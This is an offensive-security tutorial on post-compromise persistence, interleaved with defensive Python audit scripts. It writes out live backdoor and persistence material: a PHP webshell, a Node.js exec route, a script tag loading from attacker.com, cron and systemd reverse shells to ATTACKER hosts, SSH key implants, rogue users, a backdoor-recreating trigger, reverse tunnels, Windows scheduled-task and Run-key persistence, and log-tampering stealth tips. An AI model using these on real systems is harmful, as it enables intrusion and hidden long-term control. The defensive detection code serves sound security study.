Maintaining Access

Maintaining access focuses on ensuring continued control over a compromised system or application after initial exploitation. Attackers implement persistence mechanisms that survive reboots, redeployments, session invalidations, or user logouts. This phase ensures long-term monitoring, data extraction, lateral movement, and the ability to re-enter the environment without repeating the original exploit chain.

Maintaining access requires stealth, reliability, and a minimal detection footprint. Techniques vary depending on the level of compromise: web application access, server-side RCE, container access, database compromise, or full system control.

Persistence in Web Applications

Attackers maintain access inside web apps by leveraging stored tokens, hidden admin accounts, vulnerable endpoints, and implanted scripts.

1. Persistent Sessions

Many applications don’t immediately invalidate:

  • JWTs

  • API tokens

  • session cookies

  • refresh tokens

Attackers extract these from logs, databases, or memory.

Keeping a persistent session:

  • store the token offline

  • reuse it directly in HTTP requests

  • craft API calls with the stolen token

If rotation isn’t enforced, access lasts indefinitely.
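The defence against the stolen-token reuse described above is server-side revocation, not just expiry. Added example (not code from the original page): a minimal HMAC-signed token issuer in Python with a per-user generation counter, so that a logout-everywhere or password change invalidates every outstanding token, including stolen copies that have not yet expired. The signing key and user names are constructed placeholders.

```python
import base64, hashlib, hmac, json, time

# Placeholder signing key (constructed for this example; a real deployment keeps it in a secret store).
SECRET = b"demo-signing-key-not-for-production"

# Server-side "generation" per user. Bumping it on logout-everywhere or password
# change invalidates every token minted earlier, even ones that have not expired.
_generation = {}

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _sign(body: str) -> str:
    return _b64(hmac.new(SECRET, body.encode(), hashlib.sha256).digest())

def issue(user: str, ttl: int = 900, now=None) -> str:
    """Mint a short-lived token bound to the user's current generation."""
    now = time.time() if now is None else now
    claims = {"sub": user, "gen": _generation.setdefault(user, 0), "exp": now + ttl}
    body = _b64(json.dumps(claims).encode())
    return f"{body}.{_sign(body)}"

def verify(token: str, now=None):
    """Return the subject if the token is authentic, unexpired and not revoked; else None."""
    now = time.time() if now is None else now
    try:
        body, sig = token.split(".")
    except ValueError:
        return None
    if not hmac.compare_digest(sig, _sign(body)):
        return None  # forged or tampered
    claims = json.loads(_unb64(body))
    if claims["exp"] <= now:
        return None  # expired: a stolen copy is only useful for ttl seconds
    if claims["gen"] != _generation.get(claims["sub"], 0):
        return None  # predates a revoke_all(): stolen copies die here
    return claims["sub"]

def revoke_all(user: str) -> None:
    """Logout-everywhere / password change: invalidate every outstanding token for this user."""
    _generation[user] = _generation.get(user, 0) + 1
```

A short TTL bounds how long an exfiltrated token is useful; the generation check is what ends the "access lasts indefinitely" case on the next credential change.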

2. Creating Hidden Admin Accounts

If access to the admin panel or database is available:

Example SQL:

INSERT INTO users (username, password, role)
VALUES ('backupadmin', 'hashedpassword', 'admin');

The account remains unless audited.

3. Implanting Backdoor Functionality

If RCE or webshell is available, attackers embed backdoor code in:

  • templates

  • controllers

  • middleware

  • cron controllers

  • API endpoints

Example PHP backdoor:

<?php system($_GET['cmd']); ?>

Example Node.js backdoor:

app.get('/health', (req,res)=>{ require('child_process').exec(req.query.cmd) })

These blend into legitimate routes.
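Because such backdoors hide in ordinary routes, a source-level check that pairs request-input sources with command-execution sinks is a practical first pass. Added example (not from the original page): a Python scanner over constructed PHP and Node.js file contents; the two flagged lines mirror the snippets above, and `SAMPLE_FILES` and its paths are invented for the demonstration.

```python
import re

# Request-input sources and command-execution sinks for PHP and Node.js (extend as needed).
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|req\.(query|body|params)\b")
SINKS = re.compile(r"\b(system|exec|shell_exec|passthru|popen|eval|execSync|spawn)\s*\(")

# Constructed sample files, not from a real code base.
SAMPLE_FILES = {
    "app/Http/Middleware/Health.php": "<?php\nif ($_GET['ping']) { echo 'ok'; }\nsystem($_GET['cmd']);\n",
    "routes/health.js": "app.get('/health', (req,res)=>{ require('child_process').exec(req.query.cmd) })\n",
    "routes/users.js": "app.get('/users', (req,res)=>{ res.json(db.find(req.query.id)) })\n",
}

def scan_source(files):
    """Return (path, line_no, line) for every line where request input and an exec sink co-occur."""
    hits = []
    for path, text in files.items():
        for n, line in enumerate(text.splitlines(), 1):
            if SOURCES.search(line) and SINKS.search(line):
                hits.append((path, n, line.strip()))
    return hits
```

The same-line heuristic misses a source assigned to a variable on one line and passed to the sink on another; a real review pairs this with a diff of the deployed tree against version control.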

4. Injecting Malicious JavaScript for Web Access

Stored XSS enables long-term access through:

  • session hijacking

  • keylogging

  • capturing CSRF tokens

  • auto-triggering admin actions

Example payload:

<script src="https://attacker.com/persist.js"></script>

The hosted script can be updated whenever needed.


Server-Side Persistence

If attackers obtain command execution or shell access, they maintain access through OS-level persistence.

1. Creating Rogue Users

useradd -m backup
echo "backup:pass123" | chpasswd

Add to sudo:

usermod -aG sudo backup

2. SSH Key Persistence

mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys

Attackers then log in without a password.

3. Cronjob Persistence

Cron executes attacker-controlled scripts periodically.

System-level cron:

/etc/crontab

Example reverse shell cron:

* * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1

Running every minute keeps the access alive.

4. Systemd Service Persistence

A rogue service runs automatically at boot.

[Service]
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"

Load service:

systemctl enable attacker.service

5. Replacing Legitimate Binaries (Binary Backdooring)

Attackers replace legitimate tools:

  • ssh

  • sudo

  • system binaries

with trojanized versions that open backdoors or log credentials.
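The rogue-user, SSH-key and cron mechanisms in this section each leave a fingerprint in a file a defender can baseline. Added example (not from the original page): a Python audit over constructed `/etc/passwd`, crontab and `authorized_keys` contents that flags non-root UID 0 accounts and shared UIDs, cron lines with reverse-shell or decode-and-run patterns, and SSH keys absent from an enrolment allowlist. The key blobs, IP address and account names are invented placeholders.

```python
import re
from collections import defaultdict

# Constructed sample data standing in for /etc/passwd, crontab lines and an
# authorized_keys file; none of it comes from a real host.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
backup:x:1001:1001::/home/backup:/bin/bash
system-update:x:0:1002::/var/tmp:/bin/bash
"""
CRON = [
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly",
    "* * * * * bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "0 3 * * * echo bHMgLWxh | base64 -d | sh",
]
AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3Nzknown1 alice@laptop
ssh-ed25519 AAAAC3Nzrogue2 backup
"""
KNOWN_KEYS = {"AAAAC3Nzknown1"}  # blobs the team has enrolled (constructed placeholders)

# Command fragments typical of reverse shells and encoded one-liners.
SUSPICIOUS = re.compile(r"/dev/tcp/|bash -i|base64 -d|\bnc\b|curl .*\|\s*sh")

def audit_passwd(text):
    """Return (non-root UID 0 accounts, {uid: [names]} for UIDs shared by several users)."""
    uid0, by_uid = [], defaultdict(list)
    for line in text.splitlines():
        name, _, uid, *_ = line.split(":")
        by_uid[uid].append(name)
        if uid == "0" and name != "root":
            uid0.append(name)
    return uid0, {uid: names for uid, names in by_uid.items() if len(names) > 1}

def audit_cron(lines):
    """Return cron lines (system or per-user) whose command matches a suspicious pattern."""
    return [line for line in lines if SUSPICIOUS.search(line)]

def audit_authorized_keys(text, known):
    """Return (key type, comment) for keys whose blob is not in the enrolment allowlist."""
    unknown = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        if parts[1] not in known:
            unknown.append((parts[0], " ".join(parts[2:]) or "<no comment>"))
    return unknown
```

Run the same checks against every user's crontab and every home directory, not only the system files, since per-user locations are exactly where quiet persistence is placed.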


Container Persistence

Containers reboot frequently; persistence requires alternate strategies.

1. Implant in Host-Mounted Volumes

Upload scripts to:

/var/www/html/

or shared volumes used by multiple containers.

2. Escape to Host (if misconfigured)

Once on the host:

  • set up SSH keys

  • drop cron

  • create rogue users

3. Persist Inside Kubernetes

If cluster compromise occurs:

  • create malicious CronJobs

  • modify deployment manifests

  • attach containers to privileged service accounts

Example:

kubectl apply -f malicious-cronjob.yaml
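A malicious CronJob only has value if the pod it schedules can reach the host or a privileged identity, so auditing CronJob specs for those properties catches it. Added example (not from the original page): a Python policy check over one object in the shape of `kubectl get cronjob -o json`; the sample object, the registry allowlist and the privileged service-account name are constructed for the demonstration.

```python
import json

ALLOWED_REGISTRIES = ("registry.example.internal/",)  # constructed pull policy
PRIVILEGED_SAS = {"cluster-admin-sa"}                  # SAs with cluster-wide write rights (constructed)

# Constructed CronJob in the shape kubectl emits; not from a real cluster.
SAMPLE_CRONJOB = json.loads("""{
  "metadata": {"name": "system-update", "namespace": "kube-system"},
  "spec": {"schedule": "* * * * *", "jobTemplate": {"spec": {"template": {"spec": {
    "serviceAccountName": "cluster-admin-sa",
    "hostNetwork": true,
    "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
    "containers": [{"name": "u", "image": "docker.io/someone/tool:latest",
      "securityContext": {"privileged": true},
      "volumeMounts": [{"name": "root", "mountPath": "/host"}]}]
  }}}}}
}""")

def audit_cronjob(cj):
    """Return ("namespace/name", [findings]) for one CronJob object."""
    findings = []
    meta = cj["metadata"]
    pod = cj["spec"]["jobTemplate"]["spec"]["template"]["spec"]
    if cj["spec"]["schedule"].split()[0] == "*":
        findings.append("runs every minute")
    if pod.get("serviceAccountName") in PRIVILEGED_SAS:
        findings.append(f"privileged service account {pod['serviceAccountName']}")
    for key in ("hostNetwork", "hostPID", "hostIPC"):
        if pod.get(key):
            findings.append(f"{key} enabled")
    for vol in pod.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"hostPath volume {vol['hostPath']['path']}")
    for c in pod.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"container {c['name']} privileged")
        if not c["image"].startswith(ALLOWED_REGISTRIES):
            findings.append(f"image {c['image']} from unapproved registry")
    return f"{meta['namespace']}/{meta['name']}", findings
```

The same checks belong in an admission policy so a manifest like this is rejected at `kubectl apply` time rather than found later.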

Application and Database Persistence

1. Storing Payload in Database Fields

Attackers insert malicious payloads in:

  • HTML templates

  • content fields

  • admin notes

  • configuration options

Injected JS, SQL triggers, or template code execute whenever loaded.

2. Creating Malicious Database Triggers

CREATE TRIGGER persist BEFORE INSERT ON users
BEGIN
  INSERT INTO backdoor VALUES ('admin','hashedpass');
END;

Triggers re-create backdoors if removed.
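The hidden-admin insert and the re-creating trigger above are both visible in the schema and data if someone looks. Added example (not from the original page): a SQLite-based audit in Python that builds a constructed database mirroring those two snippets, lists admin accounts outside an approved baseline, finds triggers that write into a table other than the one they fire on, and shows why the trigger must be dropped before the rows are cleaned. The table names and accounts are constructed for the demonstration.

```python
import re
import sqlite3

APPROVED_ADMINS = {"alice"}  # constructed baseline of expected admin accounts

def build_sample_db():
    """Constructed in-memory database mirroring the INSERT and CREATE TRIGGER shown above."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT);
        CREATE TABLE backdoor (username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'hash1', 'admin');
        INSERT INTO users VALUES ('bob', 'hash2', 'user');
        INSERT INTO users VALUES ('backupadmin', 'hashedpassword', 'admin');
        CREATE TRIGGER persist BEFORE INSERT ON users
        BEGIN
          INSERT INTO backdoor VALUES ('admin','hashedpass');
        END;
    """)
    return db

def unexpected_admins(db):
    rows = db.execute("SELECT username FROM users WHERE role = 'admin'")
    return sorted(u for (u,) in rows if u not in APPROVED_ADMINS)

def trigger_side_effects(db):
    """(trigger, fires_on, writes_to) for triggers inserting into a different table."""
    out = []
    triggers = db.execute("SELECT name, tbl_name, sql FROM sqlite_master WHERE type='trigger'")
    for name, tbl, sql in triggers.fetchall():
        for target in re.findall(r"INSERT\s+INTO\s+(\w+)", sql, re.I):
            if target.lower() != tbl.lower():
                out.append((name, tbl, target))
    return out

def backdoor_rows(db):
    return db.execute("SELECT COUNT(*) FROM backdoor").fetchone()[0]

def remediate(db):
    """Drop the trigger first; deleting its rows alone fails because the next insert re-creates them."""
    for name, _, _ in trigger_side_effects(db):
        db.execute(f'DROP TRIGGER "{name}"')
    for user in unexpected_admins(db):
        db.execute("DELETE FROM users WHERE username = ?", (user,))
    db.execute("DELETE FROM backdoor")
    db.commit()
```

Compare the trigger list against the schema in version control; any trigger not in the migration history is the finding, whatever its name.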

3. Stashing Credentials Inside DB Comments or Hidden Records

Attackers create “invisible” data rows containing:

  • API keys

  • tokens

  • attacker-owned accounts

These remain unless specifically cleaned.


Network-Level Persistence

1. Reverse Tunnel Persistence

Attackers set up persistent reverse tunnels:

ssh -R 4444:localhost:22 attacker@remote

This makes internal hosts accessible externally.

2. Persistent VPN Access

If VPN credentials are captured:

  • OpenVPN files

  • WireGuard config

  • IPsec keys

Attackers can join the internal network indefinitely.


Using Scheduled Task Persistence on Windows

If the target is Windows:

Create scheduled task:

schtasks /create /tn "SystemUpdate" /tr "cmd.exe /c reverse.bat" /sc minute

Registry persistence:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Adding reverse-shell executables here loads them at every login.


Maintaining Access Through Logs and API Endpoints

1. Hidden API Routes

Attackers create or modify internal routes:

/api/admin/debug
/api/root/trigger

These allow:

  • executing commands

  • reading files

  • dumping databases

2. Error-Triggered Backdoors

Malformed requests trigger attacker code if error handlers were modified.

Example:

/api/bad?trigger=exec

Stealth Techniques to Avoid Detection

Attackers avoid noisy methods and hide their persistence.

Techniques include:

  • using encoded payloads

  • placing backdoors inside rarely inspected config files

  • hiding cron entries in user crontabs instead of system crontab

  • hiding accounts with UID/GID mismatches

  • modifying logs to erase evidence

  • using common service names like system-update

  • using encrypted tunnels for command execution

Stealth is crucial for long-term access.


Attack Chains Enabled by Maintained Access

Maintaining access allows chaining:

  • lateral movement

  • database takeover

  • data exfiltration

  • cloud compromise

  • internal network scanning

  • privilege escalation

  • long-term surveillance

With a persistent foothold, the attacker no longer needs to exploit the original vulnerability.


Intel Dump

  • Maintaining access ensures long-term control after initial compromise.

  • Web app persistence uses hidden admin accounts, long-lived tokens, injected scripts, and backdoored routes.

  • Server persistence uses rogue users, SSH keys, cronjobs, systemd services, and binary replacements.

  • Databases allow persistence via malicious triggers, hidden rows, and stored payloads.

  • Containers require host-level persistence or modifications to volumes, manifests, or cluster resources.

  • Cloud persistence uses metadata-extracted keys and VPN credential harvesting.

  • Network persistence includes reverse tunnels, scheduled tasks, and hidden services.

  • Persistent access enables lateral movement, escalation, and complete system domination.
